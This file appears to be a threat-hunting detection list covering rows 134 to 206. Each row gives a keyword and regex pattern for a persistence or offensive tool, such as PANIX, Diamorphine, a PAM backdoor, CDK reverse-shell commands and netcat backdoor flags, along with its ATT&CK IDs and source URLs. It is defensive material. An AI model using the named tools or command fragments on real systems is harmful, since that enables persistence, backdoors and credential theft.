134*.sh --systemd --default --ip * --port *.{0,1000}\.sh\s\-\-systemd\s\-\-default\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4900
135*.sh --udev --custom --command *.{0,1000}\.sh\s\-\-udev\s\-\-custom\s\-\-command\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4901
136*.sh --xdg --custom --command * --path */etc/xdg/autostart/*.{0,1000}\.sh\s\-\-xdg\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/etc\/xdg\/autostart\/.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4902
137*/.ssh/dropbear*.{0,1000}\/\.ssh\/dropbear.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z5038
138*/0xthirteen/*.{0,1000}\/0xthirteen\/.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay11N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z5073
139*/AbandonedCOMKeys/*.{0,1000}\/AbandonedCOMKeys\/.{0,1000}offensive_tool_keywordAbandonedCOMKeysEnumerates abandoned COM keys (specifically InprocServer32). Useful for persistenceT1547.011 - T1049 - T1087.002TA0005 - TA0007 - TA0003N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys11N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z5103
140*/ABPTTS.git*.{0,1000}\/ABPTTS\.git.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS11N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z5104
141*/ADCS.ps1*.{0,1000}\/ADCS\.ps1.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS11N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z5149
142*/Add-KeeThiefLurker.ps1*.{0,1000}\/Add\-KeeThiefLurker\.ps1.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk11N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z5172
143*/AMSI-Provider.git*.{0,1000}\/AMSI\-Provider\.git.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider11N/AN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z5303
144*/atnow.exe*.{0,1000}\/atnow\.exe.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html11N/AN/A77N/AN/AN/AN/A5454
145*/atnow.zip*.{0,1000}\/atnow\.zip.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html11N/AN/A77N/AN/AN/AN/A5455
146*/backdoor.bat*.{0,1000}\/backdoor\.bat.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor11N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z5525
147*/backdoor.exe*.{0,1000}\/backdoor\.exe.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor11N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z5526
148*/bin/dropbear*.{0,1000}\/bin\/dropbear.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z5626
149*/bin/tshd*.{0,1000}\/bin\/tshd.{0,1000}offensive_tool_keywordtshUNIX backdoorT1103 - T1105 - T1160 - T1189 - T1496 - T1102TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/creaktive/tsh10#linuxN/A1065681302024-02-20T18:07:08Z2011-05-14T19:15:00Z5660
150*/browserhistory.csv*.{0,1000}\/browserhistory\.csv.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate11N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z5823
151*/cdk_darwin_amd64*.{0,1000}\/cdk_darwin_amd64.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z5966
152*/cdk_linux_386*.{0,1000}\/cdk_linux_386.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z5967
153*/cdk_linux_amd64*.{0,1000}\/cdk_linux_amd64.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z5968
154*/cdk-fabric run reverse-shell*.{0,1000}\/cdk\-fabric\srun\sreverse\-shell.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z5969
155*/cdk-fabric run shim-pwn*.{0,1000}\/cdk\-fabric\srun\sshim\-pwn.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z5970
156*/chisel_x32*.{0,1000}\/chisel_x32.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z6014
157*/chisel_x64*.{0,1000}\/chisel_x64.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z6015
158*/chromepasswordlist.csv*.{0,1000}\/chromepasswordlist\.csv.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate11N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z6033
159*/chromepasswords.py*.{0,1000}\/chromepasswords\.py.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate11N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z6034
160*/COM-Hunter.csproj*.{0,1000}\/COM\-Hunter\.csproj.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter11N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z6159
161*/COM-Hunter.exe*.{0,1000}\/COM\-Hunter\.exe.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter11N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z6160
162*/COM-Hunter.git*.{0,1000}\/COM\-Hunter\.git.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter11N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z6161
163*/COM-Hunter.sln*.{0,1000}\/COM\-Hunter\.sln.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter11N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z6162
164*/COM-Object-hijacking.git*.{0,1000}\/COM\-Object\-hijacking\.git.{0,1000}offensive_tool_keywordCOM-Object-hijackinguse COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)T1546.015TA0003N/AN/APersistencehttps://github.com/3gstudent/COM-Object-hijacking11N/AN/A8158302017-08-04T09:19:40Z2017-08-04T08:15:36Z6175
165*/Cronos-Rootkit*.{0,1000}\/Cronos\-Rootkit.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit11N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z6276
166*/Cronos-Rootkit/*.{0,1000}\/Cronos\-Rootkit\/.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit11N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z6277
167*/Cronos-x64.zip*.{0,1000}\/Cronos\-x64\.zip.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit11N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z6278
168*/D3m0n1z3dShell.git*.{0,1000}\/D3m0n1z3dShell\.git.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z6389
169*/D3m0n1z3dShell/archive/*.{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z6390
170*/DAMP.git*.{0,1000}\/DAMP\.git.{0,1000}offensive_tool_keywordDAMPThe Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.T1222 - T1222.002 - T1548 - T1548.002TA0005 N/AN/APersistencehttps://github.com/HarmJ0y/DAMP11N/AN/A104378792019-07-25T21:18:37Z2018-04-06T22:13:58Z6398
171*/deepce.sh*.{0,1000}\/deepce\.sh.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z6504
172*/Diamorphine.git*.{0,1000}\/Diamorphine\.git.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine11#linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z6570
173*/DockerPwn.py*.{0,1000}\/DockerPwn\.py.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK11#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z6708
174*/DoUCMe.git*.{0,1000}\/DoUCMe\.git.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe11N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z6749
175*/dropbear.git*.{0,1000}\/dropbear\.git.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear11N/AN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6792
176*/dropbear.init*.{0,1000}\/dropbear\.init.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6793
177*/dropbear.log*.{0,1000}\/dropbear\.log.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6794
178*/dropbear/releases/*.{0,1000}\/dropbear\/releases\/.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear11N/AN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6795
179*/dropbear_dss_host_key*.{0,1000}\/dropbear_dss_host_key.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6796
180*/dropbear_rsa_host_key*.{0,1000}\/dropbear_rsa_host_key.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6797
181*/DynastyPersist.git*.{0,1000}\/DynastyPersist\.git.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist11#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z6864
182*/DynastyPersist/src/*.sh*.{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist11#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z6865
183*/etc/default/dropbear*.{0,1000}\/etc\/default\/dropbear.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6996
184*/etc/dropbear/*.{0,1000}\/etc\/dropbear\/.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z6998
185*/etc/xdg/autostart/evilxdg.desktop*.{0,1000}\/etc\/xdg\/autostart\/evilxdg\.desktop.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z7034
186*/http-ntlm/ntlmtransport*.{0,1000}\/http\-ntlm\/ntlmtransport.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler11N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z7904
187*/ImplantSSP.exe*.{0,1000}\/ImplantSSP\.exe.{0,1000}offensive_tool_keywordImplantSSPInstalls a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system startT1547.008 - T1073.001 - T1055.001TA0003 - TA0005N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP11N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z8050
188*/install_locutus.sh*.{0,1000}\/install_locutus\.sh.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z8100
189*/JumpSession.cna*.{0,1000}\/JumpSession\.cna.{0,1000}offensive_tool_keywordJumpSession_BOFBeacon Object File allowing creation of Beacons in different sessionsT1055 - T1055.012 - T1548.002TA0002 - TA0003 - TA0004N/AN/APersistencehttps://github.com/Octoberfest7/JumpSession_BOF11N/AN/A9180132022-05-23T22:23:33Z2022-05-21T17:38:18Z8272
190*/JumpSession_BOF.git*.{0,1000}\/JumpSession_BOF\.git.{0,1000}offensive_tool_keywordJumpSession_BOFBeacon Object File allowing creation of Beacons in different sessionsT1055 - T1055.012 - T1548.002TA0002 - TA0003 - TA0004N/AN/APersistencehttps://github.com/Octoberfest7/JumpSession_BOF11N/AN/A9180132022-05-23T22:23:33Z2022-05-21T17:38:18Z8273
191*/lib/systemd/system/evil.service*.{0,1000}\/lib\/systemd\/system\/evil\.service.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z8501
192*/linpeas.sh*.{0,1000}\/linpeas\.sh.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z8530
193*/linux-exploit-suggester.sh*.{0,1000}\/linux\-exploit\-suggester\.sh.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK11#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z8546
194*/linux-pam-backdoor.git*.{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}offensive_tool_keywordlinux-pam-backdoorLinux PAM BackdoorT1547.001 - T1556.003TA0003 - TA0004N/AN/APersistencehttps://github.com/zephrax/linux-pam-backdoor11#linuxN/A104328852023-11-13T11:29:44Z2017-06-08T21:14:34Z8547
195*/logon_backdoor.git*.{0,1000}\/logon_backdoor\.git.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor11N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z8615
196*/master/JunctionFolder/*.{0,1000}\/master\/JunctionFolder\/.{0,1000}offensive_tool_keywordJunctionFolderCreates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.T1547.001 - T1574.001 - T1204.002TA0005 - TA0004N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder11N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z8726
197*/nc64 -i *.{0,1000}\/nc64\s\-i\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10#linuxN/A1010N/AN/AN/AN/A9027
198*/nc64 -lvp *.{0,1000}\/nc64\s\-lvp\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10#linuxN/A1010N/AN/AN/AN/A9028
199*/nc64 -zv *.{0,1000}\/nc64\s\-zv\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10#linuxN/A1010N/AN/AN/AN/A9029
200*/ntlmtransport.go*.{0,1000}\/ntlmtransport\.go.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler11N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z9305
201*/Offensive-Netsh-Helper.git*.{0,1000}\/Offensive\-Netsh\-Helper\.git.{0,1000}offensive_tool_keywordOffensive-Netsh-HelperMaintain Windows Persistence with an evil Netshell Helper DLLT1174 - T1055.011 - T1546.013 - T1574.002 - T1105TA0003 N/AN/APersistencehttps://github.com/rtcrowley/Offensive-Netsh-Helper11N/AN/A911252018-07-28T02:12:09Z2018-07-25T22:49:20Z9360
202*/Office-Persistence.git*.{0,1000}\/Office\-Persistence\.git.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence11N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z9367
203*/OfficePersistence.ps1*.{0,1000}\/OfficePersistence\.ps1.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence11N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z9368
204*/Office-Persistence/master/calc.ppa*.{0,1000}\/Office\-Persistence\/master\/calc\.ppa.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence11N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z9369
205*/PANIX.git*.{0,1000}\/PANIX\.git.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX11#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z9497
206*/panix.sh --*.{0,1000}\/panix\.sh\s\-\-.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z9498
